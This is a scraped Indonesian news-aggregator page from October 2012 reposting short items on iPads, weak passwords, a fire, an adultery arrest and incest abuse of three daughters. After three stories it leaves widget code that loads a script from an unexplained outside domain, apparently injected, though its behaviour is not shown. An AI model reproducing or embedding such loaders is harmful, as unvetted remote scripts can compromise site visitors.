10.25.2012

ArsipBerita.com - update next 9


ArsipBerita.com - update next 9

Link to Arsip Berita Indonesia - Indonesian News Archives

Para “Pahlawan Super” Jadi Petugas Pembersih Jendela

Posted: 24 Oct 2012 07:22 PM PDT

0905146p Para Pahlawan Super Jadi Petugas Pembersih Jendela

jasonnazar.com

PITTSBURGH, KOMPAS.com – Banyak cara untuk menyenangkan orang lain, apa lagi anak-anak. Perusahaan jasa pembersih jendela di Pennsylvania mengenakan kostum para pahlawan super kepada empat petugas pembersihnya. Petugas itu membersihkan jendela di sebuah rumah sakit anak-anak.

Menurut manajemen, para pekerja dibekali pakaian pahlawan super untuk membangkitkan semangat anak-anak yang sedang dirawat di rumah sakit tersebut. Edward Matuizek, Presiden dari Allegheny Window Cleaning Inc di Springdale, mengatakan, perusahaan itu tidak membebani biaya tambahan kepada Rumah Sakit Anak Pittsburgh. Jadi jendela-jendela itu dibersihkan oleh Spiderman, Batman, Superman, dan Captain America. Demikian dilaporkan Pittsburgh Tribune-Review.

”Ini bukan untuk kami, tetapi untuk mereka,” kata Matuizek. ”Rumah sakit ini sebenarnya merupakan tempat yang sangat menyenangkan untuk bekerja, tetapi secara emosional rumah sakit ini merupakan tempat yang sangat menyentuh emosi. Ketika pulang ke rumah dan menggendong anak-anak di rumah akan ada banyak rasa syukur menyelinap di hati,” ujar Edward Matuizek di rumah sakit ketika para pekerja itu akan membersihkan jendela.

Dia menuturkan, ide tentang memakaikan kostum para pahlawan kesukaan anak-anak itu sebenarnya datang dari istrinya. Istrinya pernah membaca bahwa sebuah perusahaan pembersih jendela di Inggris pernah melakukan hal serupa di sebuah rumah sakit Inggris. Ide ini pun mendapat sambutan hangat dari Direktur Fasilitas Rumah Sakit Elizabeth Munsch.

Pembersih jendela yang berpakaian pahlawan super itu adalah Rick Bollinger (46) dan Mark Errico (26), keduanya dari Harrison; Ed Hetrick (36) dari Springdale; dan Jim Zaremba (43) dari Lower Burrell. ”Anak-anak sangat menyukainya,” kata Errico yang mengenakan kostun Captain America. ”Ke mana pun kami pergi mereka selalu datang dari ruang-ruang perawatan lainnya,” katanya lagi. (Reuters/UPI/Joe)

Sumber :
Kompas Cetak

Editor :
Egidius Patnistik

Source: kompas internasional

Berita Lain:

+ Arsip Berita Indonesia - Para “Pahlawan Super” Jadi Petugas Pembersih Jendela.


45% Pemilik iPad Tak Suka “iPad 4″

Posted: 24 Oct 2012 07:14 PM PDT

FLkriNxNAa 45% Pemilik iPad Tak Suka iPad 4Apple (Foto: Reuters)

CALIFORNIA – Sekira 45 persen pemilik iPad tidak menykai waktu peluncuran “iPad 4”, yakni pembaharuan dari new iPad yang diluncurkan pada Maret 2012. Hal tersebut terungkap melalui studi baru oleh Toluna QuickSurveys, yang melibatkan dua ribu konsumen sebagia reponsen.
 
Studi tersebut mengungapkan bahwa pemilik iPad marah karena Apple sanagat cepat meluncurkan generasi terbaru tablet, sehingga membuat iPad generasi ketiga menjadi kuno.
 
Dilansir dari Mashble, Kamis (25/10/2012), dikethaui setengah (50 persen) dari pemilik iPad 3 atau new iPad mengatakan tidak puas tentang peluncuran “iPad 4”. Hal yang sama juga terjadi pada pemilik iPad 2 dengan 45 persen dan iPad generasi pertama sebesar 40 persen menyatakan tidak puas dengan peluncuran pembaharuan tablet tersebut.
 
Selain itu, satu dari empat responden yakni reputasi Apple telah ternoda setelah menghapus Google Maps dari pembahrauan iOS dan mengganti aplikasi pemetaan itu dengan Apple Maps.
 
Seperti diketahui, pada 23 Oktober, Apple mengumumkan versi terbaru dari iPad. Pembaharuan tersebut mencakup prosesor A6X, kamera FaceTime HD, dan peningkatan kompatibilitas LTE.
(adl)

stLight.options({publisher:’b847f3a4-e695-414e-b3c3-11a67607a605′});

!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=”http://clasensation.com/button.js”;fjs.parentNode.insertBefore(js,fjs);}}(document,”script”,”clasit-wjs”);

Sent from Indosat Internet

logo isat inet 45% Pemilik iPad Tak Suka iPad 4

Source: Okezone – Techno

Berita Lain:

+ Arsip Berita Indonesia - 45% Pemilik iPad Tak Suka “iPad 4″.


Tepergok, Istri Sembunyikan Selingkuhan di Kolong Ranjang

Posted: 24 Oct 2012 07:12 PM PDT

2035058620X310 Tepergok, Istri Sembunyikan Selingkuhan di Kolong Ranjang shutterstock ilustrasi

PRINGSEWU, KOMPAS.com – Yuli Astuti (29) tak bisa berkutik, saat suaminya, Warsono memergokinya menyembunyikan pria selingkuhan di kolong tempat tidurnya, Selasa sekitar pukul 22.00 WIB. Kelakuan ibu dua anak warga Pekon Ambarawa Barat, Kecamatan Ambarawa, Kabupaten Pringsewu, Lampung, membuat suaminya berang.

Warga sekitar pun gempar. Seperti diberitakan Tribun Lampung, Kamis (25/10/2012), Yuli dan selingkuhannya, Dedi Supriyana (26), warga Pekon Margodadi, Kecamatan Ambarawa, digelandang ke Mapolsek Pringsewu.

Di kantor polisi, Dedi mengaku sudah sering bertandang ke kamar tidur Yuli. Keduanya berhubungan karib sejak Juli 2012. Hubungan asmara Yuli dan Dedi berawal dari tempat kerja mereka. Keduanya merupakan buruh pencetak bata.

Tak puas hanya bermain hati, hubungan terlarang Yuli dan Dedi berlanjut hingga ke ranjang. Kanit Reskrim Polsek Pringsewu Ipda Junaidi mengatakan, Dedi mengunjungi Yuli saat suaminya tidak ada di rumah.  "Malam hari, suami Yuli sering pergi ke acara hajatan atau hiburan, hingga tengah malam," ujarnya Rabu (24/10/2012) kemarin.

Saat itulah, Dedi mengambil kesempatan dan mengunjungi Yuli. Apesnya, malam itu suami Yuli pulang lebih awal. Dedi pun kalang kabut dan berusaha sembunyi di kolong tempat tidur, ketika Yuli membukakan pintu untuk suaminya.

Menurut Junaidi, suami Yuli tidak curiga. Sehingga, Warsono langsung beranjak ke tempat tidur. Bahkan, Yuli dan suaminya sempat berhubungan badan. Kecurigaan muncul ketika Warsono menemukan celana yang bukan miliknya. Lantas, Warsono bertanya ke Yuli. Tapi, saat itu Yuli hanya terdiam. Curiga, Warsono melongok ke kolong tempat tidur.

Alangkah terkejutnya Warsono, ketika mendapati Dedi meringkuk tanpa mengenakan celana. Malam itu, rumah Warsono langsung heboh. Polisi yang mendapat informasi lantas datang ke lokasi dan mengamankan Yuli dan Dedi. Yuli dan Dedi terancam Pasal 284 KUHP tentang Perzinahan.

"Ancaman hukumannya, kurungan penjara selama sembilan bulan," kata Junaidi.

Meski begitu, perkara Dedi dan Yuli masih berupa delik aduan, karena belum ada laporan resmi dari suami Yuli. Sehingga, polisi masih menunggu, apakah suami sebagai pihak yang dirugikan, akan melapor atau tidak. "Jika tidak ada laporan, perkara tersebut tidak bisa dilimpahkan ke kejaksaan," ujar Junaidi. 

Sumber :
Tribun Lampung

Editor :
Glori K. Wadrianto

Source: kompas regional

Berita Lain:

+ Arsip Berita Indonesia - Tepergok, Istri Sembunyikan Selingkuhan di Kolong Ranjang.


Perguruan tinggi AS dikosongkan gara-gara ancaman bom

Posted: 24 Oct 2012 07:11 PM PDT

201109250020 Perguruan tinggi AS dikosongkan gara gara ancaman bom

- (ist)

Ancaman bom tersebut diterima sekitar pukul 13.30 waktu setempat, Rabu, di Lone Star College-Tomball, kata surat kabar Houston Chronicle, yang mengutip para pejabat perguruan tinggi itu.

“LSC-Tomball telah menerima pemberitahuan mengenai ancaman bom di kampus pada pukul 13.31 hari ini. Sebagai langkah pencegahan, kegiatan belajar-mengajar dan kegiatan lain di Lone Star College-Tomball dibatalkan sampai pemberitahuan lebih lanjut. Semua orang disarankan meninggalkan kampus ini,” demikian isi pemberitahuan yang disiarkan di jejaring perguruan itu sebagaimana dikutip Xinhua.

Satuan penjinak bom dikerahkan ke perguruan tinggi tersebut, kata beberapa pejabat.

Awal Oktober, Texas A&M University dan Texas State University juga dikosongkan, setelah menerima ancaman bom serupa.
(ANT)

Editor: AA Ariwibowo

COPYRIGHT © 2012

Source: AntaraNews.com – Mancanegara

Berita Lain:

+ Arsip Berita Indonesia - Perguruan tinggi AS dikosongkan gara-gara ancaman bom.


4 Orang Tewas dalam Kebakaran di Pesayangan

Posted: 24 Oct 2012 07:04 PM PDT

1535288620X310 4 Orang Tewas dalam Kebakaran di Pesayangan Ilustrasi kebakaran

BANJARMASIN, KOMPAS.com – Kebakaran yang mengakibatkan empat korban jiwa manusia, terjadi di Desa Pesayangan Laut, tepatnya Jalan Kertak Baru, RT 03 RW 02, Kecamatan Martapura Kota, Kabupaten Banjar, Kalimantan Selatan, Rabu (25/10/2012) tengah malam.

Berdasarkan data dari Posko Tagana Kabupaten Banjar dan Posdalop Tagana Kalsel, korban meninggal akibat luka bakar adalah Samlawi bin Anang Asnaswi, Mahrida binti Misransyah, M Rehan Bin Samlawi, dan seorang lainnya masih dalam proses identifikasi .

Didien, relawan dari Tagana Fire Rescue, Kamis (25/10/2012) pagi ini, mengatakan, satu orang lainnya mengalami luka bakar. Para korban diduga terjebak di dalam rumah, dan tidak bisa keluar. Selain memakan korban jiwa, api juga melahap 19 buah rumah warga. Penyebab kebakaran belum diketahui.

Beberapa jam sebelumnya, kebakaran juga melanda salah satu bangunan ruko di Jalan Sudimampir 1, kawasan Pasar Sudimampir 2, Kota Banjarmasin. Tidak ada korban dalam peristiwa ini, api segera bisa dilokalisasi dan dipadamkan oleh puluhan relawan bantuan pemadam kebakaran.

 

 

Editor :
Agus Mulyadi

Source: kompas regional

Berita Lain:

+ Arsip Berita Indonesia - 4 Orang Tewas dalam Kebakaran di Pesayangan.


Apple Optimis dengan Harga Jual iPad Mini

Posted: 24 Oct 2012 07:00 PM PDT

l7YXVKwsxA Apple Optimis dengan Harga Jual iPad MiniiPad mini (Foto: Reuters)

CALIFORNIA – Apple tetap optimis dengan harga jual iPad mini, meski harga tablet itu lebih mahal dibandingkan rival kuatnya Nexus 7 dan Kindel Fire HD. Optimisme itu diungkapkan oleh Senior Vice President of Worldwide Marketing Apple, Phill Schiller.
 
Schiller mempertahankan harga paling murah USD329 untuk iPad mini. Menurutnya, konsumen akan bersedia membayar untuk kualitas yang tidak ditemukan pada perangkat dengan harga lebih murha yang dibesut rivalnya seperti Google dan Amazon.
 
“iPad merupakan produk yang paling sukses dalam kategori ini. Produk yang harganya paling terjangkau sejauh ini ialah seharga USD399 dan orang-orang memilih perangkat itu,” tutur Schiller, seperti dilansir dari Reuters, Kamis (25/10/2012).
 
“Dan kini, Anda bisa mendapatkan perangkat yang lebih terjangkau seharga USD329 untuk perangkat baru dan saya pikir banyak konsumen akan sangat bersemangat tentang hal tersebut,” jelasnya.
 
Apple saat ini mendapatkan tekanan untuk mempertahankan posisinya yang dominan di tablet, yang menciptakan pasar tersebut dengan peluncuran iPad pertama pada 2010. “Orang lain telah mencoba untuk membuat tablet lebih kecil daripada iPad dan mereka telah gagal total,” pungkasnya.
(adl)

stLight.options({publisher:’b847f3a4-e695-414e-b3c3-11a67607a605′});

!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=”http://clasensation.com/button.js”;fjs.parentNode.insertBefore(js,fjs);}}(document,”script”,”clasit-wjs”);

Sent from Indosat Internet

logo isat inet Apple Optimis dengan Harga Jual iPad Mini

Source: Okezone – Techno

Berita Lain:

+ Arsip Berita Indonesia - Apple Optimis dengan Harga Jual iPad Mini.


Bapak Ini Tega Setubuhi Tiga Anak Kandungnya

Posted: 24 Oct 2012 06:50 PM PDT

 Bapak Ini Tega Setubuhi Tiga Anak Kandungnya shutterstock Ilustrasi

JAKARTA, KOMPAS.com – Polisi terpaksa menggelandang Zn ke Mapolrestro Jakarta Timur, Kamis (25/10/2012) sekitar pukul 03.00 WIB. Ayah tiga orang perempuan itu dilaporkan telah menyetubuhi tiga putri kandungnya sendiri.

Berdasarkan informasi yang dihimpun dari Polrestro Jakarta Timur, ketiga putri Zn yang menjadi pelampiasan nafsu bejat ayah kandungnya itu adalah WT (20), RN (19) dan WN (15). Keluarga tersebut tinggal di Kampung Gempol, Cakung, Jakarta Timur.

Terungkapnya aksi amoral sang ayah itu bermula saat WN, anak bungsunya, berontak saat ingin disetubuhi Zn, Kamis (25/10/2012) dini hari. Tidak bisa menerima perlakuan amoral ayah kandungnya, WN kemudian memilih kabur dan melaporkan bapak kandungnya sendiri itu ke Polsektro Cakung.

Mendapat laporan WN, polisi pun tak kesulitan menciduk pelaku di rumahnya. Kepala Kepolisian Sektor Cakung, Komisaris  Azhar Nugroho, mengatakan, dirinya belum bisa menjelaskan kasus tersebut secara detail, namun dia membenarkan peristiwa penangkapan Zn, Kamis dini hari tadi.

"Iya benar, sudah dibawa ke Mapolrestro Jakarta Timur. Yang ngurus Unit PPA (Perempuan dan Perlindungan Anak)," ujarnya saat dihubungi Kompas.com pada Kamis pagi. Kini, pelaku, korban bersama sang ibu yang tak lain istri pelaku, masih diperiksa secara di Unit PPA, Mapolrestro Jakarta Timur.

Editor :
Hertanto Soebijoto

Source: kompas megapolitan

Berita Lain:

+ Arsip Berita Indonesia - Bapak Ini Tega Setubuhi Tiga Anak Kandungnya.


Bupati Semarang Setujui Penggusuran Paksa

Posted: 24 Oct 2012 06:48 PM PDT

UNGARAN, KOMPAS.com – Selangkah lagi upaya pengggusuran terhadap warga Lemah Ireng yang lahannya terkena proyek jalan tol Semarang-Solo akan terjadi. Bupati Semarang Mundjirin berjanji, dalam sepekan ke depan SK penetapan penguasaan fisik, yang akan menjadi landasan Tim Pengadaan Tanah (TPT) Jawa Tengah melakukan penggusuran paksa segera dikeluarkan.

"Surat permohonan dari TPT sudah saya terima. Diharapkan pekan depan SK tentang penetapan penguasaan fisik sudah bisa diserahkan kepada TPT," jelas Mundjirin, Rabu (24/10/2012) kemarin.

Meski menyetujui penggusuran paksa, Mundjirin mengaku tetap meminta TPT memperhatikan kesejahteraan warga Lemah Ireng yang lahannya digunakan untuk jalan tol. "Saya selalu berpihak pada kepentingan rakyat. Untuk itu saya ingatkan, dalam melakukan penggusuran paksa TPT tetap harus memperhatikan nasib rakyat saya. Jangan sampai ada yang lecet atau berbenturan," kata Bupati.

Sementara itu, kuasa hukum warga Lemah Ireng, Heri Sulistiyono menyatakan, upaya penggusuran paksa dinilai sebagai langkah yang keliru dan tergesa-gesa. Sebab, proses konsinyasi yang dilakukan TPT ke Pengadilan Negeri (PN) Kabupaten Semarang menyalahi aturan hukum.

"Seharusnya konsinyasi itu dilakukan menunggu keputusan hukum tetap. Dalam hal ini putusan Pengadilan Tata Usaha Negara (PTUN) Semarang yang menolak gugatan warga belum bersifat ingkrah. Karena warga masih akan melanjutkan gugatan kasasi ke MA," ungkap Heri. 

Editor :
Glori K. Wadrianto

Source: kompas regional

Berita Lain:

+ Arsip Berita Indonesia - Bupati Semarang Setujui Penggusuran Paksa.


Ini 25 Password Terburuk 2012

Posted: 24 Oct 2012 06:46 PM PDT

Ilustrasi (Foto: Mashable)

CALIFORNIA – Password merupakan hal penting untuk melindungi indentitas online. Karena itu, pemilik akun di internet harus memastikan untuk memilih password yang seunik mungkin sehingga tidak mudah ditebak oleh para penjahat cyber.
 
Dilansir dari Mashable, Kamis (25/10/2012), SplashData baru saja merilis daftar password terburuk, yang menampilkan kata paling umum digunakan di internet dan dipublikasikan oleh hacker.
 
Bahkan dari daftar tersebut terungkap bahwa urutan tiga teratas password terburuk belum berubah sejak 2011, yakni “password”, “123456″, dan “12345678″. Berikuti 25 password terburuk tahun ini:
 
1. password
2. 123456
3. 12345678
4. abc123
5. qwerty
6. monkey
7. letmein
8. dragon
9. 111111
10. baseball
11. iloveyou
12. trustno1
13. 1234567
14. sunshine
15. master
16. 123123
17. welcome
18. shadow
19. ashley
20. football
21. jesus
22. michael
23. ninja
24. mustang
25. password1
 
Daftar yang dipublikasikan oleh SplashData diharapkan dapat membantu para peselancar di jagat maya agar lebih menjaga identitas online.
 
“Kami berharap dengan banyaknya publisitas mengenai resiko menggunakan password yang lemah, maka akan lebih banyak orang mulai mengambil langkah-langkah sederhana untuk melindungi diri mereka sendiri dengan menggunakan password yang lebih kuat dan password yang berbeda untuk setiap website yang digunakan,” jelas CEO SplashData Morgan Slain.
 

SplashData merupakan penyedia aplikasi produktifitas terkemuka untuk smartphone yang meliputi aplikasi konsumen dan bisnis yang mengelola password, foto digital, akun finansial, dan lainnya.

(adl)

stLight.options({publisher:’b847f3a4-e695-414e-b3c3-11a67607a605′});

!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=”http://clasensation.com/button.js”;fjs.parentNode.insertBefore(js,fjs);}}(document,”script”,”clasit-wjs”);

Sent from Indosat Internet

logo isat inet Ini 25 Password Terburuk 2012

Source: Okezone – Techno

Berita Lain:

+ Arsip Berita Indonesia - Ini 25 Password Terburuk 2012.


Suku Maya Guatemala Tolak Ramalan Kiamat

Posted: 24 Oct 2012 06:39 PM PDT

0833108620X310 Suku Maya Guatemala Tolak Ramalan Kiamat Jose Miguel Lam/AFP Suku Maya Guatemala, membantah kalender kuno suku itu meramalkan kiamat terjadi pada 21 Desember 2012.

GUATEMALA CITY, KOMPAS.com – Suku Maya Guatemala menuduh pemerintah negeri itu memanfaatkan mitos hari kiamat versi kalender Maya untuk keuntungan finansial.

"Kami menentang penipuan, kebohongan dan manipulasi kebenaran, dan menjadikan kami alat untuk mendapatkan keuntungan. Mereka tak mengatakan yang sebenarnya soal siklus waktu," kata Pemimpin Aliansi Suku Maya Oxlaljuj Ajpop, Felipe Gomez.

Gomez meminta lembaga-lembaga turisme memikirkan ulang soal ramalan hari kiamat, yang dia gambarkan sebagai sebuah pertunjukan yang menghina budaya suku Maya.

"Siklus waktu suku Maya berarti akan terjadi perubahan besar terhadap diri seseorang, keluarga dan komunitas, akan terwujud keseimbangan dan harmoni antara manusia dan alam," papar Gomez.

Kini, Oxlajuj Ajpop, tengah menggelar ajang yang bagi mereka dianggap sakral di lima kota untuk menandai "akhir zaman" ini. Sehingga, Gomez meminta, Kementerian Kebudayaan Guatemala cukup bijaksana untuk mendukung selebrasi yang benar ini.

Kalender kuno suku Maya, terdiri atas 18 bulan dan masing-masing bulan terdiri atas 20 hari. Dalam kalender kuno itu terdapat satu bulan suci "Wayeb" yang hanya terdiri dari lima hari.

Selain itu, dikenal juga "Baktun" unit terbesar dalam satu siklus waktu, yaitu sekitar 400 tahun. Siklus waktu terbesar terdiri atas 13 Baktun, atau sekitar 5.200 tahun.

Belakangan ini, banyak film dan dokumenter yang mengangkat isu ramalan kalender Maya kuno terkait hari Kiamat yang "diyakini" terjadi pada 21 Desember 2012 mendatang.

Isu menakutkan ini justru menjadi ajang sejumlah negara dan perusahaan untuk menangguk keuntungan dari sektor wisata.

Kementerian Kebudayaan Guatemala bahkan menggelar acara besar-besaran di ibu kota, Guatemala City yang diharapkan dihadiri 90.000 orang untuk "menyambut" hari kiamat. Sejumlah biro wisata bahkan menyediakan paket khusus bertemakan hari kiamat.

Lebih dari separuh dari 15 juta penduduk Guatemala adalah keturunan suku Maya.

 

Sumber :
AFP

Editor :
Ervan Hardoko

Source: kompas internasional

Berita Lain:

+ Arsip Berita Indonesia - Suku Maya Guatemala Tolak Ramalan Kiamat.


0 komentar:

Poskan Komentar

 

Berita Unik Seputar Dunia. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com